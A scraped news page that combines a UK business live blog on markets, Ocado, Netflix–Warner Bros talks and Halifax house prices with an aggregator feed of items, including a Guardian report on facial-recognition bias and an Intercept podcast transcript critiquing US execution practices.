European stock markets are ending the week on the front foot.

The main European indices are a little higher this morning; Germany’s DAX is up 0.55%, France’s CAC 40 is 0.3% higher, and the UK’s FTSE 100 has risen by 0.14%.

Investors are waiting for new US inflation data later today (1.30pm UK time), which could influence interest rate expectations ahead of next week’s US Federal Reserve meeting.

Kyle Rodda, senior financial market analyst at capital.com, says:

Risk assets are cautiously edging higher to round out the week, with US PCE Index data in focus this afternoon.

Ultimately, the markets appear to be looking for a signal that it’s all clear to keep moving higher again. That signal could come from data. But given the lack of it between now and the middle of next week, it’s more likely to come from the FOMC decision.

The current implied probabilities of a cut are 87%, according to FedWatch – swaps markets suggest a little higher. The markets won’t just want to see a cut delivered but also some dovish enough language and forecasts about the prospect of future cuts. Another hawkish cut, like that which was seen in October, could upset the apple cart, if it were to occur.

Nevertheless, European stocks have run with a broadly positive lead-in from Asian markets, with US futures also pointing higher.

Mark Sweney

Warner Bros Discovery has entered exclusive talks to sell its streaming and Hollywood studio business to Netflix, a move that would dramatically change the established film and TV landscape.

Netflix is in competition with Paramount Skydance and Comcast, which owns assets including Universal Studios and Sky, to buy the owner of the Hollywood studio Warner Bros , HBO and the HBO Max streaming service.

Netflix is offering a $5bn (£3.7bn) breakup fee if the deal fails to gain regulatory approval in the US, according to Bloomberg, which first reported the exclusive talks.

Ocado shares jump 11% after agreeing $350m payment from Kroger

Shares in Ocado have jumped by over 10% at the start of trading, after it agreed a compensation deal with US grocer Kroger.

Ocado is to receive a one-off $350m cash payment from Kroger, which decided last month to close three robotic warehouses which use the UK company’s high-tech equipment, in Maryland, Wisconsin, and Florida.

That decision, announced in mid-November, had knocked 17% off Ocado’s shares.

This morning, though, they’ve jumped to the top of the FTSE 250 index, up 11.5% to 206p.

Ocado had previously said it expected to receive more than $250m in compensation from Kroger.

But it has also revealed today that Kroger has decided to cancel another tie-up with Ocado – a planned automated distribution centre run on the UK group’s technology in Charlotte, North Carolina.

Last month, retail analyst Clive Black of Shore Capital said Ocado was “being marginalised as most of its customer fulfilment centres do not work economically in the USA”.

Ocado says it continues to “work closely” with Kroger on five other customer fulfillment centres in US states such as Texas and Michigan.

Tim Steiner, CEO of Ocado Group, has said:

“We continue to invest significant resources to support our partners at Kroger, and to help them build on our longstanding partnership. Ocado’s technology has evolved significantly to include both the new technologies that Kroger is currently deploying in its CFC network, as well as new fulfilment products that bring Ocado’s technology to a wider range of applications, including Store Based Automation to support ‘pick up’ and immediacy.”

“Our partners around the world have already deployed a wide range of these fulfilment technologies to great effect, enabling them to address a wide spectrum of geographies, population densities and online shopping missions, underpinned by Ocado’s world leading expertise and R&D capabilities. We remain excited about the opportunity for Ocado’s evolving products in the US market.”

House prices predicted to rise in 2026, after budget uncertainty

Halifax’s Amanda Bryden reckons UK house prices will rise “gradually” next year, saying:

“Looking ahead, with market activity steady and expectations of further interest rate reductions to come, we anticipate property prices will continue to grow gradually into 2026.”

Karen Noye , mortgage expert at Quilter , says affordability remains the biggest hurdle, even though inflation has eased and another interest rate cut is expected later this month, adding:

“The outlook for 2026 rests on the path of mortgage rates and the resilience of household incomes. Greater clarity post budget and the prospect of lower borrowing costs give the market a firmer footing, but affordability will remain the defining constraint.”

Tom Bill, head of UK residential research at Knight Frank, says pre-Budget uncertainty pushed house price growth close to zero, adding:

“Clarity has now returned, but an array of tax rises, which include an income tax threshold freeze, will increasingly squeeze demand and prices. Offsetting that is the fact that mortgage rates are expected to drift lower next year as the base rate bottoms out at around 3.25%.”

Technically, UK house prices did rise slightly last month. On Halifax’s data, the average price was £299,892, marginally up from £299,754 in October. That’s a new record high on this index.
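
For a sense of just how marginal that rise was, the month-on-month change works out to less than 0.05%, a quick check using only the two figures above:

```python
# The month-on-month move implied by the two Halifax figures quoted above.

october, november = 299_754, 299_892
change = november / october - 1
print(f"Monthly change: {change:.3%}")  # ~0.046%, i.e. broadly flat
```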

Halifax: a clear North/South divide on house price changes

Halifax’s regional data continues to show a clear North/South divide – prices fell in the south of the UK last month, but rose elsewhere.

  • Northern Ireland remains the strongest performing nation or region in the UK, with average property prices rising by +8.9% over the past year (up from +7.9% last month). The typical home now costs £220,716.

  • Scotland recorded annual price growth of +3.7% in November, up to an average of £216,781. In Wales property values rose +1.9% year-on-year to £229,430.

  • In England, the North West recorded the highest annual growth rate, with property prices rising by +3.2% to £245,070, followed by the North East with growth of +2.9% to £180,939. Further south, three regions saw prices decrease in November.

  • In London prices fell by -1.0%, the South East by -0.3% and Eastern England by -0.1%. The capital remains the most expensive part of the UK, with an average property now costing £539,766.

Introduction: UK house prices stagnated in November, weak retail spending too

Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.

As the first week of December draws to a close, we have fresh evidence that the economy cooled in the run-up to last month’s budget.

UK house prices were broadly unchanged in November, lender Halifax reports, with the average property changing hands for £299,892. That stagnation follows a 0.5% rise in October and, with incomes still rising, leaves houses slightly more affordable for new buyers.

On an annual basis, prices were 0.7% higher – down from +1.9% house price inflation in October.

Amanda Bryden, head of mortgages at Halifax, explains:

“This consistency in average prices reflects what has been one of the most stable years for the housing market over the last decade. Even with the changes to Stamp Duty back in spring and some uncertainty ahead of the Autumn Budget, property values have remained steady.

“While slower growth may disappoint some existing homeowners, it’s welcome news for first-time buyers. Comparing property prices to average incomes, affordability is now at its strongest since late 2015. Taking into account today’s higher interest rates, mortgage costs as a share of income are at their lowest level in around three years.”

A chart showing UK house prices Photograph: Halifax

Shoppers also reined in their spending in the shops last month.

A survey by business advisory service BDO has found that in-store sales grew by just +1.3% in November, despite the potential sales boost from Black Friday.

That is well below the rate of inflation, which means sales volumes are significantly down, BDO says.

The agenda

  • 7am GMT: Halifax house price index for November

  • 7am GMT: German factory orders data for October

  • 8.30am GMT: UN food commodities price index

  • 3pm GMT: US PCE inflation report

  • 3pm GMT: University of Michigan consumer confidence report

LISP Style & Design

Lobsters
archive.org
2025-12-05 11:12:00
Comments...
Original Article

LISP STYLE & DESIGN explores the process of style in the development of Lisp programs. Style comprises efficient algorithms, good organization, appropriate abstractions, well-constructed function definitions, useful commentary, and effective debugging. Good design and style enhance programming efficiency because they make programs easier to understand, to debug, and to maintain.

A special feature of this book is the large programming example that the authors use throughout to illustrate how the process develops: organizing the approach, choosing constructs, using abstractions, structuring files, debugging code, and improving program efficiency. Lisp programmers, symbolic programmers or those intrigued by symbolic programming, as well as students of Lisp, should consider this book an essential addition to their libraries.

Molly M. Miller is Manager of Technical Publications and Training for Lucid, Inc. She holds degrees in Computer Science, Mathematics, and English and has done graduate work in symbolic and heuristic computation at Stanford University.

Eric Benson is Principal Scientist at Lucid, Inc. He is a graduate of the University of Utah with a degree in mathematics and is a co-founder of Lucid.

Home Office admits facial recognition tech issue with black and Asian subjects

Guardian
www.theguardian.com
2025-12-05 11:11:18
Calls for review after technology found to return more false positives for ‘some demographic groups’ on certain settingsUK politics live – latest updatesMinisters are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to ...
Original Article

Ministers are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to incorrectly identify black and Asian people than their white counterparts on some settings.

Following the latest testing conducted by the National Physical Laboratory (NPL) of the technology’s application within the police national database, the Home Office said it was “more likely to incorrectly include some demographic groups in its search results”.

Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion.

The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.

Facial recognition technology scans people’s faces and then cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or be used by officers to target individuals as they walk by mounted cameras.

Images of suspects can also be run retrospectively through police, passport or immigration databases to identify them and check their backgrounds.

Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.

The testing went on to find that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.
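
For clarity on the metric: a false positive identification rate is the share of searches for people who are not in the database that nonetheless return a match. The sketch below shows the calculation; the search counts are invented for illustration and chosen only so that the resulting rates echo the report’s figures.

```python
# Illustration of how an FPIR is computed per demographic group. The counts
# below are invented; only the resulting rates echo the report's figures.

from dataclasses import dataclass

@dataclass
class GroupResult:
    group: str
    non_mated_searches: int  # searches where the subject is NOT in the database
    false_positives: int     # searches that nonetheless returned a match

    @property
    def fpir(self) -> float:
        return self.false_positives / self.non_mated_searches

results = [
    GroupResult("white subjects", 10_000, 4),    # 0.04%
    GroupResult("Asian subjects", 10_000, 400),  # 4.0%
    GroupResult("black subjects", 10_000, 550),  # 5.5%
]

for r in results:
    print(f"{r.group}: FPIR = {r.fpir:.2%}")
```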

The Association of Police and Crime Commissioners said in a statement that the findings showed an inbuilt bias. It said: “This has meant that in some circumstances it is more likely to incorrectly match black and Asian people than their white counterparts. The language is technical but behind the detail it seems clear that technology has been deployed into operational policing without adequate safeguards in place.”

The statement, signed off by the APCC leads Darryl Preston, Alison Lowe, John Tizard and Chris Nelson, questioned why the findings had not been released at an earlier opportunity or shared with black and Asian communities.

It said: “Although there is no evidence of adverse impact in any individual case, that is more by luck than design. System failures have been known for some time, yet these were not shared with those communities affected, nor with leading sector stakeholders.”

The government announced a 10-week public consultation that it hopes will pave the way for the technology to be used more often. The public will be asked whether police should be able to go beyond their records to access other databases, including passport and driving licence images, to track down criminals.

Civil servants are working with police to establish a new national facial recognition system that will hold millions of images.

Charlie Whelton, a policy and campaigns officer for the campaign group Liberty, said: “The racial bias in these stats shows the damaging real-life impacts of letting police use facial recognition without proper safeguards in place. With thousands of searches a month using this discriminatory algorithm, there are now serious questions to be answered over just how many people of colour were falsely identified, and what consequences this had.

“This report is yet more evidence that this powerful and opaque technology cannot be used without robust safeguards in place to protect us all, including real transparency and meaningful oversight. The government must halt the rapid rollout of facial recognition technology until these are in place to protect each of us and prioritise our rights – something we know the public wants.”

The former cabinet minister David Davis raised concerns after police leaders said the cameras could be placed at shopping centres, stadiums and transport hubs to hunt for wanted criminals. He told the Daily Mail: “Welcome to big brother Britain. It is clear the government intends to roll out this dystopian technology across the country. Something of this magnitude should not happen without full and detailed debate in the House of Commons.”

Officials say the technology is needed to help catch serious offenders. They say there are manual safeguards, written into police training, operational practice and guidance, that require all potential matches returned from the police national database to be visually assessed by a trained user and investigating officer.

A Home Office spokesperson said: “The Home Office takes the findings of the report seriously and we have already taken action. A new algorithm has been independently tested and procured, which has no statistically significant bias. It will be tested early next year and will be subject to evaluation.

“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports.”

Why We Can't Quit Excel

Hacker News
www.bloomberg.com
2025-12-05 11:07:07
Comments...

Lethal Illusion: Understanding the Death Penalty Apparatus

Intercept
theintercept.com
2025-12-05 11:00:00
Malcolm Gladwell and Liliana Segura unpack how the death penalty is administered in America. The post Lethal Illusion: Understanding the Death Penalty Apparatus appeared first on The Intercept....
Original Article

As of December 1, officials across the U.S. have executed 44 people in 11 states, making 2025 one of the deadliest years for state-sanctioned executions in recent history. According to the Death Penalty Information Center, three more people are scheduled for execution before the new year.

The justification for the death penalty is that it’s supposed to be the ultimate punishment for the worst crimes. But in reality, who gets sentenced to die depends on things that often have nothing to do with guilt or innocence.

Historically, judges have disproportionately sentenced Black and Latino people to death. A new report from the American Civil Liberties Union released in November found that more than half of the 200 people exonerated from death row since 1973 were Black.

Executions had been on a steady decline since their peak in the late 1990s. But the numbers slowly started to creep back up in recent years, more than doubling from 11 in 2021 to 25 last year, and we’ve almost doubled that again this year. Several states have stood out in their efforts to ramp up executions and conduct them at a faster pace — including Alabama.

Malcolm Gladwell’s new podcast series “ The Alabama Murders ” dives into one case to understand what the system really looks like and how it operates. Death by lethal injection involves a three-drug protocol: a sedative, a paralytic, and, lastly, potassium chloride, which is supposed to stop the heart. Gladwell explains to Intercept Briefing host Akela Lacy how it was developed, “It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something ‘more humane.’ And their model was why don’t we do for humans what we do with horses?”

Liliana Segura , an Intercept senior reporter who has covered capital punishment and criminal justice for two decades , adds that the protocol is focused on appearances. “It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look, using the tools of medicine to kill … like this has really been thought through.” She says, “These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science.”

Listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , or wherever you listen.

Transcript

Akela Lacy: Malcolm and Liliana, welcome to the show.

Malcolm Gladwell: Thank you.

Liliana Segura: Thank you.

AL: Malcolm, the series starts by recounting the killing of Elizabeth Sennett, but very quickly delves into what happens to the two men convicted of killing her, John Parker and Kenny Smith. You spend a lot of time in this series explaining, sometimes in graphic detail, how the cruelty of the death penalty isn’t only about the execution, but also about the system around it — the paperwork, the waiting. This is not the kind of subject matter that you typically tackle. What drew you to wanting to report on the death penalty and criminal justice?

MG: I wasn’t initially intending to do a story about the death penalty. I, on a kind of whim, spent a lot of time with Kate Porterfield, who’s the psychologist who studies trauma, who shows up halfway through “The Alabama Murders.”

I was just interviewing her about, because I was interested in the treatment of traumatized people, and she just happened to mention that she’d been involved with the death penalty case — and her description of it was so moving and compelling that I realized, oh, that’s the story I want to tell. But this did not start as a death penalty project. It started as an exploration of a psychologist’s work, and it kind of took a detour.

AL: Tell us a little bit more about how the bureaucracy around the death penalty masks its inherent cruelty.

MG: There’s a wonderful phrase that one of the people we interviewed, Joel Zivot, uses. He talks about how the death penalty — he was talking about lethal injection, but this is also true of nitrogen gas — he said it is the impersonation of a medical act. And I think that phrase speaks volumes, that a lot of what is going on here is a kind of performance that is for the benefit of the viewer. It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.

“They’re interested in the impersonation of a medical act, not the implementation of a medical act.”

It is the management of perception that is compelling and driving the behavior here — not the actual treatment of the condemned prisoner him/herself. And once you understand that, oh, it’s a performance, then a lot of it makes sense.

One of the crucial moments in the story we tell is, where there is a hearing in which the attorneys for Kenny Smith are trying to get a stay of execution, and they start asking the state of Alabama, the corrections people in the state of Alabama to explain, did they understand what they would do? They were contemplating the use of nitrogen gas. Did they ever talk to a doctor about the risks associated with it? Did they ever contemplate any of the potential side effects ? And it turns out they had done none of that. And it makes sense when you realize that’s not what they’re interested in.

They’re interested in the impersonation of a medical act, not the implementation of a medical act. The bureaucracy is there to make it look good, and that was one of the compelling lessons of the piece.

AL: And it’s impersonating a medical act with people who are not doctors, right? Like people who are not, do not have this training.

MG: In that hearing, there’s this real incredible moment where one of the attorneys asks the man who heads Alabama’s Department of Corrections, did you ever consult with any medical personnel about the choice of execution method and its possible problems? And the guy says no.

You just realize, they’re just mailing it in. Like they have no — the state of Alabama is not interested in exploring the kind of full implications of what they’re doing. They’re just engaged in this kind of incredibly slapdash operation.

“It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.”

AL: Liliana, I wanna bring you in here. You’ve spent years reporting on capital punishment in the U.S. and looked into many cases in different states. Why are states like Florida and Alabama ramping up the number of executions? Is it all politics? What’s going on there?

LS: That is one of the questions that I think a lot of us who cover this stuff have been asking ourselves all year long. And to some degree, it’s always politics. The story of the death penalty, the story of executions, so often really boils down to that.

We are in a political moment right now where the appetite for, and promotion of, vengeance and brutality toward our enemies, certainly around executions but in general too, is really shockingly real. And I was reluctant about a year ago to really trace our current moment to Trump. The death penalty has been a bipartisan project; I don’t want to pretend like this is something that begins and ends with somebody like Trump.

That said, it’s really shocking to see the number of executions that are being pushed through, especially in Florida. And this is something that has been ramped up by Gov. DeSantis for purely political reasons. This death penalty push in Florida began with his political ambitions when he was originally going to run for president. And I think that to some degree is a story behind a lot of death penalty policy, certainly going back decades, and certainly speaks to the moment we’re in.

I did want to just also touch on some of what Malcolm was talking about when it comes to the performance of executions themselves. Over the past many years, I’ve reported on litigation, death penalty trials, that have taken place in states like Oklahoma and here in Tennessee where I live, where we restarted executions some years ago after a long time of not carrying any out. And these trials had, at the center, the three-drug protocol that is described so thoroughly in the podcast.

It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look — using the tools of medicine to kill — and made to look like this has really been thought through. But when you really trace that history — as you do, Malcolm, in your podcast — there’s no there there.

These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science. There was no way to test these methods. Nobody can tell us, as you described in your podcast, what it feels like to undergo this execution process. And I think it’s really important to remember that this is not only the story of lethal injection, this is the story of executions writ large.

When the electric chair came on the scene generations ago, it was also touted as the height of technology because it was using electricity and it was supposed to be more humane than hanging. There had been botched hangings that were seen as gruesome ordeals. So there’s this bizarre way in which history repeats itself when it comes to these methods that are promoted as the height of modernity and humanity —and it’s just completely bankrupt and false.

AL: Malcolm, do you want to add something?

MG: Yeah. The case I’m describing, Kenny Smith’s, was notorious because he had a botched execution where they couldn’t find a vein. And one of the points that Joel Zivot makes is that, of course, it’s not surprising that in that case and in many others they can’t find a vein, because that is a medical procedure designed to be undertaken in a hospital setting by trained personnel with the cooperation of the patient. Usually we’d find a vein, and the patient cooperates, because we’re trying to save their life or make them healthier. This use of the procedure is completely different. It is outside of a medical institution, it is not being done by experienced medical professionals, and it is not being done with the cooperation of the patient. The patient in this case is a condemned prisoner who is not in the same situation as someone who’s ill and trying to get better.

AL: I want to just walk our listeners through this. So this is, again, one of the pieces of the series, this three-drug protocol. First there’s a sedative, then there’s a paralytic, and then there’s finally potassium chloride, which is supposed to stop the heart. How did that protocol come to be developed?

MG: It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something “more humane.”

And their model was, well, why don’t we do for humans what we do with horses? Which was a suggestion that had come from Ronald Reagan, then governor of California. So they just generally thought, well, we can do a version of what we do in those instances, only we’ll just ramp up the dose. This is also a kind of anesthesia sometimes.

AL: This is advertised as something that is supposed to be painless.

MG: And these drugs were also in use in the medical setting, but their idea was, we’ll take a protocol that is loosely based on what is used in a medical setting and ramp up the doses so that instead of merely sedating somebody, we’re killing them.

“ It wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys.”

And it wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys, dreaming up something on the back of an envelope. And one of the guys, the medical examiner, later regretted his part in the whole procedure, but the genie was out of the bottle. And everybody jumped on this as an advance over the previous iteration of killing technology.

AL: In addition to being advertised as painless, it’s also supposed to be within the bounds of the Eighth Amendment protection against cruel and unusual punishment. Can you tell us about that?

MG: In order to satisfy that prohibition against cruel and unusual punishment, you have to have some insight as to what the condemned prisoner is going through when they are being subjected to this protocol. The universe of people engaged in the capital punishment project were universally indifferent to trying to find out how exactly this worked. They weren’t curious at all to figure out, for example, was there any suffering that was associated with this three-drug protocol, or which of the three drugs is killing you? Or, I could go on and on and on.

They just implemented it and because it looked good from the outside, because you have given someone a sedative and a paralytic, it’s impossible to tell from the outside whether they’re going through any kind of suffering. It was just assumed that there should be no, there must be no suffering going on the inside.

And the Eighth Amendment does not say that people should not be subjected to the appearance of cruel and unusual punishment. It says, no, the actual punishment itself for the individual should not be cruel and unusual. So at no point in the early history of this did anyone truly satisfy the intent of the Eighth Amendment.

AL: Liliana, you’ve written a lot about this protocol as well, and the Supreme Court has taken a stance on it . Tell us about that.

LS: So one thing that’s really important to understand about the Eighth Amendment and the death penalty in this country is that the U.S. Supreme Court has weighed in on the death penalty numerous times, but has never invalidated a method of execution as violating the Eighth Amendment ban on cruel and unusual punishment. And that fact right there I think speaks volumes.

But one of the cases that I go back to over and over again in my work about lethal injection and about other execution methods, dates back to the 1940s, and it’s a case involving a man named Willie Francis, who was a teenager, a Black teenager who had been condemned to die in Louisiana. They sent him to the electric chair in 1946, and he survived. He survived their initial attempts to execute him. It’s a grotesque ordeal, there’s been a lot written historically about this.

In that case, they stopped the execution. He appealed to the U.S. Supreme Court, and a majority of justices found that attempting to kill him again wouldn’t violate the Eighth Amendment, and they sent him back; in 1947, they succeeded in killing him. But the language that comes out of the court in this case really goes a long way to helping us understand how we ended up where we are now. They essentially said, “Accidents happen. Accidents happen for which no man is to blame.” And there’s another turn of phrase that’s really galling in which essentially they call this ordeal that he suffered “an innocent misadventure.” And this language, this idea that this was an innocent misadventure, finds its way into subsequent rulings decades later.

So in 2008, I believe it was, the U.S. Supreme Court took up the three-drug protocol, which at the time was being used by Kentucky. This was a case called Baze v. Rees . There was a lot of evidence, there was a lot that the justices had to look at that should have given them pause about the fact that this protocol was not rooted in science. That there had been many botched executions — in terms of the inability to find a vein, in terms of evidence that people were suffering on the gurney.

The U.S. Supreme Court upheld that protocol, and yet right around the time that they handed down that ruling, states began tinkering with the lethal injection protocol that had been the prevailing method for so long.

Without getting too deep in the weeds, the initial drug — the drug that was supposed to anesthetize people who were being killed by lethal injection — was originally a drug called sodium thiopental, which was believed, for good reasons, to be something that could basically put a person under, so that they wouldn’t necessarily feel the noxious effects of the subsequent drugs.

States were unable to get their hands on this drug for a number of reasons, and subsequently began swapping out other drugs to replace it. And different states tried different things. A number of states eventually settled on this drug called midazolam, which is a sedative, which does not have the same properties as the previous drug — and over and over again, experts have said that this is not a drug that’s going to be effective in anesthetizing people for the purpose of lethal injection.

The Supreme Court once again took this up. In Oklahoma, this was the case Glossip v. Gross, which the Supreme Court heard after there had been a very high-profile, really gruesome botched execution of a man named Clayton Lockett in 2014. This ended up going up to the Supreme Court. And I covered that oral argument, and what was really astonishing about it wasn’t just how grotesque it all was, but the fact that the justices were very clearly annoyed, very cranky about the fact that, only a few years after having upheld this three-drug protocol, now they’re having to deal with this thing again. And again, they upheld this protocol, despite a lot of evidence that this was completely inhumane, that there was a lot of reason to be concerned that people were suffering on the gurney while being put to death by lethal injection.

And so the reason I go back to the Willie Francis case is that it really tells us everything that we need to know. Which is that if you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country. And so the Supreme Court has weighed in not only on the three-drug protocol, but on execution methods in general. And they have always found that there’s not really a problem here.

“If you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country.”

MG: At a certain point, it becomes obvious that the cruelty is the point. The Eighth Amendment does not actually have any kind of impact on their thinking because they are anxious to preserve the very thing about capital punishment that is so morally noxious, which is that it’s cruel.

AL: Malcolm, one interesting thing that you talk about in this series is this concept of judicial override in Alabama, where a judge was able to impose a death sentence even if the jury recommended life in prison. This went on until 2017. As we know, death penalty cases can take decades, so it’s possible that there are still people on death row who have been impacted by judicial override. What’s your sense about how judges who went that route justified their decisions, if at all?

MG: So Alabama was one of a small number of states who, in response to the Supreme Court’s hesitancy about capital punishment in the 1970s, instituted rules which said that a judge can override a jury’s sentencing determination in a capital case.

So if a jury says, “We want life imprisonment without parole,” the judge could impose a death penalty or vice versa. The motivation for this series of override laws — and only about three or four states had them: Florida, Alabama, a couple of others — is murky. But I suspect what they wanted to do was to guard against the possibility that juries would become overwhelmingly lenient.

The concern was that public sentiment was moving away from the death penalty to the extent that it would be difficult to impose a death penalty in capital cases unless you allowed judges to independently assert their opinion when it came to sentencing. And I also suspect that, in states like Alabama, there was a little bit of a racial motivation: they thought that Black juries would be unlikely to vote for the death penalty for Black defendants, and they wanted to reserve the right to act in those cases.

And what happens in Alabama is that other states gradually abandon this policy, but Alabama sticks to it — not only that, they have the most extreme version of it. They basically allow the judge to overrule under any circumstances without giving an explanation for why.

And when they finally get rid of this, they don’t make it retroactive. So they only say, “Going forward, we’re not going to do override. But we’re not going to spare people who are on death row now because of override — we’re not going to spare their lives.” And so it raises this question about, the reason we call our series “The Alabama Murders” is that when you look very closely at the case we’re interested in, you quickly come to the conclusion there’s something particularly barbaric about the political culture of Alabama. Not news, by the way, for anyone who knows anything about Alabama. But Alabama, it’s its own thing, and they remain to this day clinging to this notion that they need every possible defense against the possibility that a convicted murderer could escape with his life.

AL: Speaking of the title of the show, I also want to bring up something I did not know: that the autopsy after an execution (and I don’t know whether this is unique to Alabama) marks the death as a homicide. I was actually shocked to hear that.

MG: Yeah, isn’t that interesting? That is the one moment of honesty and self-awareness in this entire process.

AL: Right, that’s why it’s shocking. It’s not shocking because we know it’s a homicide. It’s shocking because they’re admitting to it in a record that is accessible to the public at some point.

[Break]

AL: Malcolm, you mentioned the racial dynamic with Alabama in particular, but Liliana, I want to ask if you could maybe speak to the historic link between the development of the death penalty and the history of lynching in the South.

LS: So it’s really interesting. Alabama is, in many ways, the poster child for this line that can be drawn from slavery to lynching, to Reconstruction, to state-sanctioned murder. And that’s an uneasy line to draw in the sense of — there’s a reason that Bryan Stevenson, who is the head of the Equal Justice Initiative, has called the death penalty the “stepchild of lynching.”

He calls it the stepchild of lynching and it’s because, there’s something of an indirect link, but it’s an absolutely — that link is real. And you really see it in Alabama and certainly in the South. I think it was in 2018, I went down to Montgomery a number of times for the opening of EJI’s lynching memorial that they had launched there and this was a major event. At the time I went with this link in mind to try to interrogate and understand this history a little bit better. And I ended up writing this big long piece, which I only recently went back to reread because it’s not fresh in my mind anymore.

But one of the things that is absolutely, undoubtedly true is that the death penalty in the South in its early days was justified using the exact same rationale that people used for lynching, which was that this was about protecting white women from sexually predatory Black men.

“The death penalty in the South in its early days was justified using the exact same rationale that people used for lynching.”

And that line, that consistent feature of executions — whether it was an extrajudicial lynching or an execution carried out by the state — has been really consistent and I think overlooked in the history of the death penalty. And part of the reason it’s overlooked is that, again, going back to the Supreme Court, there have been a number of times that this history has come before the Supreme Court and other courts, and by and large, the reaction has been to look away, to deny this.

That was absolutely true in the years leading up to the 1972 case, Furman v. Georgia, which Malcolm alluded to earlier. There was this moment where the Supreme Court had to pause executions. And this was a four-year period in the ’70s: 1972 was Furman v. Georgia; 1976 was Gregg v. Georgia. Part of the reason that Furman invalidated the death penalty across the country was that there was evidence that death sentences were being handed down in what they called an arbitrary way.

And in reality, it wasn’t so much arbitrariness, as very clear evidence of sentences that were being given disproportionately to people of color, to Black people, and history showed that that was largely motivated by cases in which a victim was white. It was a white woman maybe who had been subjected to sexual violence. There is that link, and I think it’s really important to remember that.

In Alabama, one of the really interesting things, going back to judicial override, is this kind of irony in the history of the way it was carried out by judges. Alabama, when it restarted the death penalty in the early ’80s, was getting a lot of flak for essentially having a racist death penalty system. Of course, there was a lot of defensiveness around this, and there were judges who, in cases where juries did not come back with a death sentence for a white defendant, overrode that decision in a sort of display of fairness.

One of the things that I found when I was researching my piece from 2018 was that there was a judge in, I believe it was 1999, who explained why he overrode the jury in sentencing this particular white man to die. And he said, “If I had not imposed the death sentence, I would’ve sentenced three Black people to death and no white people.” So this was his way of ensuring fairness. “Well, I’ve gotta override it here,” never mind what it might say about the jury in the decision not to hand down a death sentence for a white person.

“They needed the appearance of fairness.”

Again, it goes back to appearance. They needed the appearance of fairness. And so Alabama really does typify a certain kind of racial dynamic and early history of the death penalty that you see throughout the South, not just the South, but especially in the South.

AL: One of the things proponents of the death penalty are adamant about is that it requires some element of secrecy to survive.

Executions happen behind closed walls, in small rooms, late at night. The people involved never have their identities or credentials publicly revealed. The concern is that if people really knew what was involved, there would be a massive public outcry. Malcolm, in this series you describe in gruesome detail what is actually involved in an execution. For folks who haven’t heard the series, tell us about that.

MG: In Alabama, there is a long execution protocol. A written script, which was made public only because it came out during a lawsuit, which kind of lays out all the steps that the state takes. And Alabama also has, to your point, an unusual level of secrecy.

For example, in many states, the entire execution process is open, at least to witnesses. In Alabama, you only see the person after they’ve found a vein. So in the Kenny Smith case we were talking about, where they spent hours unsuccessfully trying to find a vein — that was all done behind closed doors.

And the second thing that you pointed out is the people who are involved remain anonymous, and you can understand why. It is an acknowledgment on the part of these states that they are engaged in something shameful. If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?

But instead, they go in the opposite direction and they try and shroud it. They make it as much of a mystery as they can. And it’s funny, so much of our knowledge about death penalty procedures only comes out because of lawsuits.

“If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?”

It is only under the compulsion of the judicial process that we learn even the smallest tidbit about what’s going on or what kind of thought went into a particular procedure. When we’re talking about the state taking the life of a citizen of the United States, that’s weird, right?

We have more transparency over the most prosaic aspects of government practice than we do about something that involves something as important as taking someone’s life.

AL: Liliana, you’ve witnessed two executions. Tell us about your experience, and particularly this aspect of secrecy surrounding the process.

LS: Let me just pick up first on the secrecy piece because one of the really bizarre aspects of the death penalty, when you’ve covered it in different states and looked at the federal system as well, is that there’s just this wide range when it comes to what states and jurisdictions are willing to reveal and show.

What they are not willing to reveal is certainly the individuals involved. A ton of death penalty states have passed secrecy legislation, essentially bringing all of that information even further behind closed doors. The identity of the executioners was always sort of a secret. But now we don’t get to know where they get the drugs, and in some states, in some places, the secrecy is really shocking. I just wrote a story about Indiana, which recently restarted executions. And Indiana is the only active death penalty state that does not allow any media witnesses. There is nothing, and that’s exceptional.

And if you go out and try as a journalist to cover an execution in Indiana, it’s not going to be like in Alabama or in Oklahoma, where the head of the DOC comes out and addresses things and says, whether true or not true, “Everything went great.” No, you are in a parking lot at midnight across from the prison. There is absolutely nobody coming to tell you what happened. It’s a ludicrous display of indifference and contempt, frankly, for the press or for the public that has a right and an interest in knowing what’s happening in their names. So secrecy — there’s a range, I guess is my point, and yes, most places err on the side of not revealing anything, but some take that a lot further than others.

In terms of the experience of witnessing an execution, that’s obviously a big question. I will say that both those executions were in Oklahoma. That is a state that has a really ugly, sordid history of botched executions going back more than 10 years.

